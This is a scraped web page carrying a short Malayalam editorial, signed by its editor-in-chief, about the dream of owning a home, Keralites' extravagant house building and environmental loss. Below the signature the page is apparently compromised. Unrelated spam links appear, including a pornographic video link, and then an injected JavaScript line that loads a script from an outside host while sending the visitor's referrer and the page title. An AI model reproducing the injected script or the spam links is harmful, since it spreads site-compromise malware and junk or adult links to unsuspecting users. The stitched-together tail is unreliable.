printcall_gif

Editorial

സ്വന്തമായൊരു വീട് ഏതൊരു മനുഷ്യന്‍റെയും സ്വപ്നമാണ്. ലോകത്തില്‍ എവിടെ ആയിരുന്നാലും സ്വന്തം വീട്ടില്‍ മടങ്ങി എത്താന്‍ ഏവരും കൊതിക്കും. ഓരോ മനുഷ്യനും അവന്റെ മനസ്സില്‍, പണിയാന്‍ പോകുന്ന സ്വന്തം വീടിന്റെ രൂപം ഉണ്ടാകും. വീടിനു മാത്രം നല്‍കാന്‍ കഴിയുന്ന ചില സാന്ത്വനങ്ങളുണ്ട്.

എന്നാല്‍ പലപ്പോഴും നമ്മുടെ ആവശ്യങ്ങള്‍ക്കപ്പുറം സൗധങ്ങള്‍ വാങ്ങുകയും പണികഴിപ്പിക്കുകയും ചെയ്യുന്ന പ്രവണത മലയാളികളില്‍ കൂടി വരുന്നു. ഒരു പക്ഷേ, ഇന്നലെയുടെ ഇല്ലായ്മകളില്‍ നിന്നും പതഞ്ഞു പൊങ്ങിയ പ്രതികാരത്തിന്റെ പ്രകടനങ്ങളാകാം ഈ ആര്‍ഭാടം. അന്തസ്സിന്റെയും ആഭിജാത്യത്തിന്റെയും മുഖം, മില്ല്യണ്‍ ഡോള്ളര്‍ വില പറയുന്ന വീടുകളല്ല, മറിച്ച് അവിടെ വസിക്കുന്നവരിലെ സന്തോഷവും സമാധാനവും സാമ്പത്തിക ഭദ്രതയുമാണ്.

നദിയും മലകളും എല്ലാം നഷ്ടമായിക്കൊണ്ടിരിക്കുന്നു…
മണ്ണിനും വെള്ളത്തിനുമായി സമരങ്ങള്‍ അവിടവിടെ ആരംഭിച്ചു കഴിഞ്ഞു. ഈ സാഹചര്യത്തില്‍ നമ്മുടെ വീടുകള്‍ എങ്ങനെ ആകണമെന്നതിനെ കുറിച്ച് ഒരു പുനര്‍ചിന്തനം നടത്തുന്നത് നന്നായിരിക്കും…

Tom Tharakan
Editor in Chief

smartum.by/
www.xn--n8juba3duf1630agt2e.com/
profshina.kiev.ua
avtokum.com/
Lingerie Porn Videos oncesearch.com

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

error: Content is protected !!